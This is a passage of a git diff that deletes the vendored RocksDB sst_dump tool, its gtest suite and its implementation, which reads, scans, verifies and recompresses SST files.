diff --git a/thirdparty/rocksdb/tools/sst_dump.cc b/thirdparty/rocksdb/tools/sst_dump.cc
deleted file mode 100644
index 617d758..0000000
--- a/thirdparty/rocksdb/tools/sst_dump.cc
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/sst_dump_tool.h"
-
-int main(int argc, char** argv) {
-  rocksdb::SSTDumpTool tool;
-  tool.Run(argc, argv);
-  return 0;
-}
-#else
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/sst_dump_test.cc b/thirdparty/rocksdb/tools/sst_dump_test.cc
deleted file mode 100644
index 460b5a2..0000000
--- a/thirdparty/rocksdb/tools/sst_dump_test.cc
+++ /dev/null
@@ -1,223 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <stdint.h>
-#include "rocksdb/sst_dump_tool.h"
-
-#include "rocksdb/filter_policy.h"
-#include "table/block_based_table_factory.h"
-#include "table/table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-const uint32_t optLength = 100;
-
-namespace {
-static std::string MakeKey(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "k_%04d", i);
-  InternalKey key(std::string(buf), 0, ValueType::kTypeValue);
-  return key.Encode().ToString();
-}
-
-static std::string MakeValue(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "v_%04d", i);
-  InternalKey key(std::string(buf), 0, ValueType::kTypeValue);
-  return key.Encode().ToString();
-}
-
-void createSST(const std::string& file_name,
-               const BlockBasedTableOptions& table_options) {
-  std::shared_ptr<rocksdb::TableFactory> tf;
-  tf.reset(new rocksdb::BlockBasedTableFactory(table_options));
-
-  unique_ptr<WritableFile> file;
-  Env* env = Env::Default();
-  EnvOptions env_options;
-  ReadOptions read_options;
-  Options opts;
-  const ImmutableCFOptions imoptions(opts);
-  rocksdb::InternalKeyComparator ikc(opts.comparator);
-  unique_ptr<TableBuilder> tb;
-
-  env->NewWritableFile(file_name, &file, env_options);
-  opts.table_factory = tf;
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory> >
-      int_tbl_prop_collector_factories;
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(file), EnvOptions()));
-  std::string column_family_name;
-  int unknown_level = -1;
-  tb.reset(opts.table_factory->NewTableBuilder(
-      TableBuilderOptions(imoptions, ikc, &int_tbl_prop_collector_factories,
-                          CompressionType::kNoCompression, CompressionOptions(),
-                          nullptr /* compression_dict */,
-                          false /* skip_filters */, column_family_name,
-                          unknown_level),
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      file_writer.get()));
-
-  // Populate slightly more than 1K keys
-  uint32_t num_keys = 1024;
-  for (uint32_t i = 0; i < num_keys; i++) {
-    tb->Add(MakeKey(i), MakeValue(i));
-  }
-  tb->Finish();
-  file_writer->Close();
-}
-
-void cleanup(const std::string& file_name) {
-  Env* env = Env::Default();
-  env->DeleteFile(file_name);
-  std::string outfile_name = file_name.substr(0, file_name.length() - 4);
-  outfile_name.append("_dump.txt");
-  env->DeleteFile(outfile_name);
-}
-}  // namespace
-
-// Test for sst dump tool "raw" mode
-class SSTDumpToolTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-
-  SSTDumpToolTest() {}
-
-  ~SSTDumpToolTest() {}
-};
-
-TEST_F(SSTDumpToolTest, EmptyFilter) {
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=raw");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, FilterBlock) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, true));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=raw");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, FullFilterBlock) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=raw");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, GetProperties) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--show_properties");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-
-TEST_F(SSTDumpToolTest, CompressedSizes) {
-  table_options_.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  std::string file_name = "rocksdb_sst_test.sst";
-  createSST(file_name, table_options_);
-
-  char* usage[3];
-  for (int i = 0; i < 3; i++) {
-    usage[i] = new char[optLength];
-  }
-
-  snprintf(usage[0], optLength, "./sst_dump");
-  snprintf(usage[1], optLength, "--command=recompress");
-  snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst");
-  rocksdb::SSTDumpTool tool;
-  ASSERT_TRUE(!tool.Run(3, usage));
-
-  cleanup(file_name);
-  for (int i = 0; i < 3; i++) {
-    delete[] usage[i];
-  }
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as SSTDumpTool is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE  return RUN_ALL_TESTS();
diff --git a/thirdparty/rocksdb/tools/sst_dump_tool.cc b/thirdparty/rocksdb/tools/sst_dump_tool.cc
deleted file mode 100644
index 4dca284..0000000
--- a/thirdparty/rocksdb/tools/sst_dump_tool.cc
+++ /dev/null
@@ -1,689 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "tools/sst_dump_tool_imp.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <iostream>
-#include <map>
-#include <memory>
-#include <sstream>
-#include <vector>
-
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/table_reader.h"
-#include "util/compression.h"
-#include "util/random.h"
-
-#include "port/port.h"
-
-namespace rocksdb {
-
-SstFileReader::SstFileReader(const std::string& file_path,
-                             bool verify_checksum,
-                             bool output_hex)
-    :file_name_(file_path), read_num_(0), verify_checksum_(verify_checksum),
-    output_hex_(output_hex), ioptions_(options_),
-    internal_comparator_(BytewiseComparator()) {
-  fprintf(stdout, "Process %s\n", file_path.c_str());
-  init_result_ = GetTableReader(file_name_);
-}
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-extern const uint64_t kLegacyPlainTableMagicNumber;
-
-const char* testFileName = "test_file_name";
-
-static const std::vector<std::pair<CompressionType, const char*>>
-    kCompressions = {
-        {CompressionType::kNoCompression, "kNoCompression"},
-        {CompressionType::kSnappyCompression, "kSnappyCompression"},
-        {CompressionType::kZlibCompression, "kZlibCompression"},
-        {CompressionType::kBZip2Compression, "kBZip2Compression"},
-        {CompressionType::kLZ4Compression, "kLZ4Compression"},
-        {CompressionType::kLZ4HCCompression, "kLZ4HCCompression"},
-        {CompressionType::kXpressCompression, "kXpressCompression"},
-        {CompressionType::kZSTD, "kZSTD"}};
-
-Status SstFileReader::GetTableReader(const std::string& file_path) {
-  // Warning about 'magic_number' being uninitialized shows up only in UBsan
-  // builds. Though access is guarded by 's.ok()' checks, fix the issue to
-  // avoid any warnings.
-  uint64_t magic_number = Footer::kInvalidTableMagicNumber;
-
-  // read table magic number
-  Footer footer;
-
-  unique_ptr<RandomAccessFile> file;
-  uint64_t file_size;
-  Status s = options_.env->NewRandomAccessFile(file_path, &file, soptions_);
-  if (s.ok()) {
-    s = options_.env->GetFileSize(file_path, &file_size);
-  }
-
-  file_.reset(new RandomAccessFileReader(std::move(file), file_path));
-
-  if (s.ok()) {
-    s = ReadFooterFromFile(file_.get(), nullptr /* prefetch_buffer */,
-                           file_size, &footer);
-  }
-  if (s.ok()) {
-    magic_number = footer.table_magic_number();
-  }
-
-  if (s.ok()) {
-    if (magic_number == kPlainTableMagicNumber ||
-        magic_number == kLegacyPlainTableMagicNumber) {
-      soptions_.use_mmap_reads = true;
-      options_.env->NewRandomAccessFile(file_path, &file, soptions_);
-      file_.reset(new RandomAccessFileReader(std::move(file), file_path));
-    }
-    options_.comparator = &internal_comparator_;
-    // For old sst format, ReadTableProperties might fail but file can be read
-    if (ReadTableProperties(magic_number, file_.get(), file_size).ok()) {
-      SetTableOptionsByMagicNumber(magic_number);
-    } else {
-      SetOldTableOptions();
-    }
-  }
-
-  if (s.ok()) {
-    s = NewTableReader(ioptions_, soptions_, internal_comparator_, file_size,
-                       &table_reader_);
-  }
-  return s;
-}
-
-Status SstFileReader::NewTableReader(
-    const ImmutableCFOptions& ioptions, const EnvOptions& soptions,
-    const InternalKeyComparator& internal_comparator, uint64_t file_size,
-    unique_ptr<TableReader>* table_reader) {
-  // We need to turn off pre-fetching of index and filter nodes for
-  // BlockBasedTable
-  if (BlockBasedTableFactory::kName == options_.table_factory->Name()) {
-    return options_.table_factory->NewTableReader(
-        TableReaderOptions(ioptions_, soptions_, internal_comparator_,
-                           /*skip_filters=*/false),
-        std::move(file_), file_size, &table_reader_, /*enable_prefetch=*/false);
-  }
-
-  // For all other factory implementation
-  return options_.table_factory->NewTableReader(
-      TableReaderOptions(ioptions_, soptions_, internal_comparator_),
-      std::move(file_), file_size, &table_reader_);
-}
-
-Status SstFileReader::VerifyChecksum() {
-  return table_reader_->VerifyChecksum();
-}
-
-Status SstFileReader::DumpTable(const std::string& out_filename) {
-  unique_ptr<WritableFile> out_file;
-  Env* env = Env::Default();
-  env->NewWritableFile(out_filename, &out_file, soptions_);
-  Status s = table_reader_->DumpTable(out_file.get());
-  out_file->Close();
-  return s;
-}
-
-uint64_t SstFileReader::CalculateCompressedTableSize(
-    const TableBuilderOptions& tb_options, size_t block_size) {
-  unique_ptr<WritableFile> out_file;
-  unique_ptr<Env> env(NewMemEnv(Env::Default()));
-  env->NewWritableFile(testFileName, &out_file, soptions_);
-  unique_ptr<WritableFileWriter> dest_writer;
-  dest_writer.reset(new WritableFileWriter(std::move(out_file), soptions_));
-  BlockBasedTableOptions table_options;
-  table_options.block_size = block_size;
-  BlockBasedTableFactory block_based_tf(table_options);
-  unique_ptr<TableBuilder> table_builder;
-  table_builder.reset(block_based_tf.NewTableBuilder(
-      tb_options,
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      dest_writer.get()));
-  unique_ptr<InternalIterator> iter(table_reader_->NewIterator(ReadOptions()));
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    if (!iter->status().ok()) {
-      fputs(iter->status().ToString().c_str(), stderr);
-      exit(1);
-    }
-    table_builder->Add(iter->key(), iter->value());
-  }
-  Status s = table_builder->Finish();
-  if (!s.ok()) {
-    fputs(s.ToString().c_str(), stderr);
-    exit(1);
-  }
-  uint64_t size = table_builder->FileSize();
-  env->DeleteFile(testFileName);
-  return size;
-}
-
-int SstFileReader::ShowAllCompressionSizes(
-    size_t block_size,
-    const std::vector<std::pair<CompressionType, const char*>>&
-        compression_types) {
-  ReadOptions read_options;
-  Options opts;
-  const ImmutableCFOptions imoptions(opts);
-  rocksdb::InternalKeyComparator ikc(opts.comparator);
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory> >
-      block_based_table_factories;
-
-  fprintf(stdout, "Block Size: %" ROCKSDB_PRIszt "\n", block_size);
-
-  for (auto& i : compression_types) {
-    if (CompressionTypeSupported(i.first)) {
-      CompressionOptions compress_opt;
-      std::string column_family_name;
-      int unknown_level = -1;
-      TableBuilderOptions tb_opts(imoptions, ikc, &block_based_table_factories,
-                                  i.first, compress_opt,
-                                  nullptr /* compression_dict */,
-                                  false /* skip_filters */, column_family_name,
-                                  unknown_level);
-      uint64_t file_size = CalculateCompressedTableSize(tb_opts, block_size);
-      fprintf(stdout, "Compression: %s", i.second);
-      fprintf(stdout, " Size: %" PRIu64 "\n", file_size);
-    } else {
-      fprintf(stdout, "Unsupported compression type: %s.\n", i.second);
-    }
-  }
-  return 0;
-}
-
-Status SstFileReader::ReadTableProperties(uint64_t table_magic_number,
-                                          RandomAccessFileReader* file,
-                                          uint64_t file_size) {
-  TableProperties* table_properties = nullptr;
-  Status s = rocksdb::ReadTableProperties(file, file_size, table_magic_number,
-                                          ioptions_, &table_properties);
-  if (s.ok()) {
-    table_properties_.reset(table_properties);
-  } else {
-    fprintf(stdout, "Not able to read table properties\n");
-  }
-  return s;
-}
-
-Status SstFileReader::SetTableOptionsByMagicNumber(
-    uint64_t table_magic_number) {
-  assert(table_properties_);
-  if (table_magic_number == kBlockBasedTableMagicNumber ||
-      table_magic_number == kLegacyBlockBasedTableMagicNumber) {
-    options_.table_factory = std::make_shared<BlockBasedTableFactory>();
-    fprintf(stdout, "Sst file format: block-based\n");
-    auto& props = table_properties_->user_collected_properties;
-    auto pos = props.find(BlockBasedTablePropertyNames::kIndexType);
-    if (pos != props.end()) {
-      auto index_type_on_file = static_cast<BlockBasedTableOptions::IndexType>(
-          DecodeFixed32(pos->second.c_str()));
-      if (index_type_on_file ==
-          BlockBasedTableOptions::IndexType::kHashSearch) {
-        options_.prefix_extractor.reset(NewNoopTransform());
-      }
-    }
-  } else if (table_magic_number == kPlainTableMagicNumber ||
-             table_magic_number == kLegacyPlainTableMagicNumber) {
-    options_.allow_mmap_reads = true;
-
-    PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = kPlainTableVariableLength;
-    plain_table_options.bloom_bits_per_key = 0;
-    plain_table_options.hash_table_ratio = 0;
-    plain_table_options.index_sparseness = 1;
-    plain_table_options.huge_page_tlb_size = 0;
-    plain_table_options.encoding_type = kPlain;
-    plain_table_options.full_scan_mode = true;
-
-    options_.table_factory.reset(NewPlainTableFactory(plain_table_options));
-    fprintf(stdout, "Sst file format: plain table\n");
-  } else {
-    char error_msg_buffer[80];
-    snprintf(error_msg_buffer, sizeof(error_msg_buffer) - 1,
-             "Unsupported table magic number --- %lx",
-             (long)table_magic_number);
-    return Status::InvalidArgument(error_msg_buffer);
-  }
-
-  return Status::OK();
-}
-
-Status SstFileReader::SetOldTableOptions() {
-  assert(table_properties_ == nullptr);
-  options_.table_factory = std::make_shared<BlockBasedTableFactory>();
-  fprintf(stdout, "Sst file format: block-based(old version)\n");
-
-  return Status::OK();
-}
-
-Status SstFileReader::ReadSequential(bool print_kv, uint64_t read_num,
-                                     bool has_from, const std::string& from_key,
-                                     bool has_to, const std::string& to_key,
-                                     bool use_from_as_prefix) {
-  if (!table_reader_) {
-    return init_result_;
-  }
-
-  InternalIterator* iter =
-      table_reader_->NewIterator(ReadOptions(verify_checksum_, false));
-  uint64_t i = 0;
-  if (has_from) {
-    InternalKey ikey;
-    ikey.SetMaxPossibleForUserKey(from_key);
-    iter->Seek(ikey.Encode());
-  } else {
-    iter->SeekToFirst();
-  }
-  for (; iter->Valid(); iter->Next()) {
-    Slice key = iter->key();
-    Slice value = iter->value();
-    ++i;
-    if (read_num > 0 && i > read_num)
-      break;
-
-    ParsedInternalKey ikey;
-    if (!ParseInternalKey(key, &ikey)) {
-      std::cerr << "Internal Key ["
-                << key.ToString(true /* in hex*/)
-                << "] parse error!\n";
-      continue;
-    }
-
-    // the key returned is not prefixed with out 'from' key
-    if (use_from_as_prefix && !ikey.user_key.starts_with(from_key)) {
-      break;
-    }
-
-    // If end marker was specified, we stop before it
-    if (has_to && BytewiseComparator()->Compare(ikey.user_key, to_key) >= 0) {
-      break;
-    }
-
-    if (print_kv) {
-      fprintf(stdout, "%s => %s\n",
-          ikey.DebugString(output_hex_).c_str(),
-          value.ToString(output_hex_).c_str());
-    }
-  }
-
-  read_num_ += i;
-
-  Status ret = iter->status();
-  delete iter;
-  return ret;
-}
-
-Status SstFileReader::ReadTableProperties(
-    std::shared_ptr<const TableProperties>* table_properties) {
-  if (!table_reader_) {
-    return init_result_;
-  }
-
-  *table_properties = table_reader_->GetTableProperties();
-  return init_result_;
-}
-
-namespace {
-
-void print_help() {
-  fprintf(stderr,
-          R"(sst_dump --file=<data_dir_OR_sst_file> [--command=check|scan|raw]
-    --file=<data_dir_OR_sst_file>
-      Path to SST file or directory containing SST files
-
-    --command=check|scan|raw|verify
-        check: Iterate over entries in files but dont print anything except if an error is encounterd (default command)
-        scan: Iterate over entries in files and print them to screen
-        raw: Dump all the table contents to <file_name>_dump.txt
-        verify: Iterate all the blocks in files verifying checksum to detect possible coruption but dont print anything except if a corruption is encountered
-        recompress: reports the SST file size if recompressed with different
-                    compression types
-
-    --output_hex
-      Can be combined with scan command to print the keys and values in Hex
-
-    --from=<user_key>
-      Key to start reading from when executing check|scan
-
-    --to=<user_key>
-      Key to stop reading at when executing check|scan
-
-    --prefix=<user_key>
-      Returns all keys with this prefix when executing check|scan
-      Cannot be used in conjunction with --from
-
-    --read_num=<num>
-      Maximum number of entries to read when executing check|scan
-
-    --verify_checksum
-      Verify file checksum when executing check|scan
-
-    --input_key_hex
-      Can be combined with --from and --to to indicate that these values are encoded in Hex
-
-    --show_properties
-      Print table properties after iterating over the file when executing
-      check|scan|raw
-
-    --set_block_size=<block_size>
-      Can be combined with --command=recompress to set the block size that will
-      be used when trying different compression algorithms
-
-    --compression_types=<comma-separated list of CompressionType members, e.g.,
-      kSnappyCompression>
-      Can be combined with --command=recompress to run recompression for this
-      list of compression types
-
-    --parse_internal_key=<0xKEY>
-      Convenience option to parse an internal key on the command line. Dumps the
-      internal key in hex format {'key' @ SN: type}
-)");
-}
-
-}  // namespace
-
-int SSTDumpTool::Run(int argc, char** argv) {
-  const char* dir_or_file = nullptr;
-  uint64_t read_num = -1;
-  std::string command;
-
-  char junk;
-  uint64_t n;
-  bool verify_checksum = false;
-  bool output_hex = false;
-  bool input_key_hex = false;
-  bool has_from = false;
-  bool has_to = false;
-  bool use_from_as_prefix = false;
-  bool show_properties = false;
-  bool show_summary = false;
-  bool set_block_size = false;
-  std::string from_key;
-  std::string to_key;
-  std::string block_size_str;
-  size_t block_size;
-  std::vector<std::pair<CompressionType, const char*>> compression_types;
-  uint64_t total_num_files = 0;
-  uint64_t total_num_data_blocks = 0;
-  uint64_t total_data_block_size = 0;
-  uint64_t total_index_block_size = 0;
-  uint64_t total_filter_block_size = 0;
-  for (int i = 1; i < argc; i++) {
-    if (strncmp(argv[i], "--file=", 7) == 0) {
-      dir_or_file = argv[i] + 7;
-    } else if (strcmp(argv[i], "--output_hex") == 0) {
-      output_hex = true;
-    } else if (strcmp(argv[i], "--input_key_hex") == 0) {
-      input_key_hex = true;
-    } else if (sscanf(argv[i],
-               "--read_num=%lu%c",
-               (unsigned long*)&n, &junk) == 1) {
-      read_num = n;
-    } else if (strcmp(argv[i], "--verify_checksum") == 0) {
-      verify_checksum = true;
-    } else if (strncmp(argv[i], "--command=", 10) == 0) {
-      command = argv[i] + 10;
-    } else if (strncmp(argv[i], "--from=", 7) == 0) {
-      from_key = argv[i] + 7;
-      has_from = true;
-    } else if (strncmp(argv[i], "--to=", 5) == 0) {
-      to_key = argv[i] + 5;
-      has_to = true;
-    } else if (strncmp(argv[i], "--prefix=", 9) == 0) {
-      from_key = argv[i] + 9;
-      use_from_as_prefix = true;
-    } else if (strcmp(argv[i], "--show_properties") == 0) {
-      show_properties = true;
-    } else if (strcmp(argv[i], "--show_summary") == 0) {
-      show_summary = true;
-    } else if (strncmp(argv[i], "--set_block_size=", 17) == 0) {
-      set_block_size = true;
-      block_size_str = argv[i] + 17;
-      std::istringstream iss(block_size_str);
-      iss >> block_size;
-      if (iss.fail()) {
-        fprintf(stderr, "block size must be numeric\n");
-        exit(1);
-      }
-    } else if (strncmp(argv[i], "--compression_types=", 20) == 0) {
-      std::string compression_types_csv = argv[i] + 20;
-      std::istringstream iss(compression_types_csv);
-      std::string compression_type;
-      while (std::getline(iss, compression_type, ',')) {
-        auto iter = std::find_if(
-            kCompressions.begin(), kCompressions.end(),
-            [&compression_type](std::pair<CompressionType, const char*> curr) {
-              return curr.second == compression_type;
-            });
-        if (iter == kCompressions.end()) {
-          fprintf(stderr, "%s is not a valid CompressionType\n",
-                  compression_type.c_str());
-          exit(1);
-        }
-        compression_types.emplace_back(*iter);
-      }
-    } else if (strncmp(argv[i], "--parse_internal_key=", 21) == 0) {
-      std::string in_key(argv[i] + 21);
-      try {
-        in_key = rocksdb::LDBCommand::HexToString(in_key);
-      } catch (...) {
-        std::cerr << "ERROR: Invalid key input '"
-          << in_key
-          << "' Use 0x{hex representation of internal rocksdb key}" << std::endl;
-        return -1;
-      }
-      Slice sl_key = rocksdb::Slice(in_key);
-      ParsedInternalKey ikey;
-      int retc = 0;
-      if (!ParseInternalKey(sl_key, &ikey)) {
-        std::cerr << "Internal Key [" << sl_key.ToString(true /* in hex*/)
-                  << "] parse error!\n";
-        retc = -1;
-      }
-      fprintf(stdout, "key=%s\n", ikey.DebugString(true).c_str());
-      return retc;
-    } else {
-      fprintf(stderr, "Unrecognized argument '%s'\n\n", argv[i]);
-      print_help();
-      exit(1);
-    }
-  }
-
-  if (use_from_as_prefix && has_from) {
-    fprintf(stderr, "Cannot specify --prefix and --from\n\n");
-    exit(1);
-  }
-
-  if (input_key_hex) {
-    if (has_from || use_from_as_prefix) {
-      from_key = rocksdb::LDBCommand::HexToString(from_key);
-    }
-    if (has_to) {
-      to_key = rocksdb::LDBCommand::HexToString(to_key);
-    }
-  }
-
-  if (dir_or_file == nullptr) {
-    fprintf(stderr, "file or directory must be specified.\n\n");
-    print_help();
-    exit(1);
-  }
-
-  std::vector<std::string> filenames;
-  rocksdb::Env* env = rocksdb::Env::Default();
-  rocksdb::Status st = env->GetChildren(dir_or_file, &filenames);
-  bool dir = true;
-  if (!st.ok()) {
-    filenames.clear();
-    filenames.push_back(dir_or_file);
-    dir = false;
-  }
-
-  fprintf(stdout, "from [%s] to [%s]\n",
-      rocksdb::Slice(from_key).ToString(true).c_str(),
-      rocksdb::Slice(to_key).ToString(true).c_str());
-
-  uint64_t total_read = 0;
-  for (size_t i = 0; i < filenames.size(); i++) {
-    std::string filename = filenames.at(i);
-    if (filename.length() <= 4 ||
-        filename.rfind(".sst") != filename.length() - 4) {
-      // ignore
-      continue;
-    }
-    if (dir) {
-      filename = std::string(dir_or_file) + "/" + filename;
-    }
-
-    rocksdb::SstFileReader reader(filename, verify_checksum,
-                                  output_hex);
-    if (!reader.getStatus().ok()) {
-      fprintf(stderr, "%s: %s\n", filename.c_str(),
-              reader.getStatus().ToString().c_str());
-      continue;
-    }
-
-    if (command == "recompress") {
-      reader.ShowAllCompressionSizes(
-          set_block_size ? block_size : 16384,
-          compression_types.empty() ? kCompressions : compression_types);
-      return 0;
-    }
-
-    if (command == "raw") {
-      std::string out_filename = filename.substr(0, filename.length() - 4);
-      out_filename.append("_dump.txt");
-
-      st = reader.DumpTable(out_filename);
-      if (!st.ok()) {
-        fprintf(stderr, "%s: %s\n", filename.c_str(), st.ToString().c_str());
-        exit(1);
-      } else {
-        fprintf(stdout, "raw dump written to file %s\n", &out_filename[0]);
-      }
-      continue;
-    }
-
-    // scan all files in give file path.
-    if (command == "" || command == "scan" || command == "check") {
-      st = reader.ReadSequential(
-          command == "scan", read_num > 0 ? (read_num - total_read) : read_num,
-          has_from || use_from_as_prefix, from_key, has_to, to_key,
-          use_from_as_prefix);
-      if (!st.ok()) {
-        fprintf(stderr, "%s: %s\n", filename.c_str(),
-            st.ToString().c_str());
-      }
-      total_read += reader.GetReadNumber();
-      if (read_num > 0 && total_read > read_num) {
-        break;
-      }
-    }
-
-    if (command == "verify") {
-      st = reader.VerifyChecksum();
-      if (!st.ok()) {
-        fprintf(stderr, "%s is corrupted: %s\n", filename.c_str(),
-                st.ToString().c_str());
-      } else {
-        fprintf(stdout, "The file is ok\n");
-      }
-      continue;
-    }
-
-    if (show_properties || show_summary) {
-      const rocksdb::TableProperties* table_properties;
-
-      std::shared_ptr<const rocksdb::TableProperties>
-          table_properties_from_reader;
-      st = reader.ReadTableProperties(&table_properties_from_reader);
-      if (!st.ok()) {
-        fprintf(stderr, "%s: %s\n", filename.c_str(), st.ToString().c_str());
-        fprintf(stderr, "Try to use initial table properties\n");
-        table_properties = reader.GetInitTableProperties();
-      } else {
-        table_properties = table_properties_from_reader.get();
-      }
-      if (table_properties != nullptr) {
-        if (show_properties) {
-          fprintf(stdout,
-                  "Table Properties:\n"
-                  "------------------------------\n"
-                  "  %s",
-                  table_properties->ToString("\n  ", ": ").c_str());
-          fprintf(stdout, "# deleted keys: %" PRIu64 "\n",
-                  rocksdb::GetDeletedKeys(
-                      table_properties->user_collected_properties));
-
-          bool property_present;
-          uint64_t merge_operands = rocksdb::GetMergeOperands(
-              table_properties->user_collected_properties, &property_present);
-          if (property_present) {
-            fprintf(stdout, "  # merge operands: %" PRIu64 "\n",
-                    merge_operands);
-          } else {
-            fprintf(stdout, "  # merge operands: UNKNOWN\n");
-          }
-        }
-        total_num_files += 1;
-        total_num_data_blocks += table_properties->num_data_blocks;
-        total_data_block_size += table_properties->data_size;
-        total_index_block_size += table_properties->index_size;
-        total_filter_block_size += table_properties->filter_size;
-      }
-      if (show_properties) {
-        fprintf(stdout,
-                "Raw user collected properties\n"
-                "------------------------------\n");
-        for (const auto& kv : table_properties->user_collected_properties) {
-          std::string prop_name = kv.first;
-          std::string prop_val = Slice(kv.second).ToString(true);
-          fprintf(stdout, "  # %s: 0x%s\n", prop_name.c_str(),
-                  prop_val.c_str());
-        }
-      }
-    }
-  }
-  if (show_summary) {
-    fprintf(stdout, "total number of files: %" PRIu64 "\n", total_num_files);
-    fprintf(stdout, "total number of data blocks: %" PRIu64 "\n",
-            total_num_data_blocks);
-    fprintf(stdout, "total data block size: %" PRIu64 "\n",
-            total_data_block_size);
-    fprintf(stdout, "total index block size: %" PRIu64 "\n",
-            total_index_block_size);
-    fprintf(stdout, "total filter block size: %" PRIu64 "\n",
-            total_filter_block_size);
-  }
-  return 0;
-}
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/sst_dump_tool_imp.h b/thirdparty/rocksdb/tools/sst_dump_tool_imp.h
deleted file mode 100644
index 9531b54..0000000
--- a/thirdparty/rocksdb/tools/sst_dump_tool_imp.h
+++ /dev/null
@@ -1,83 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
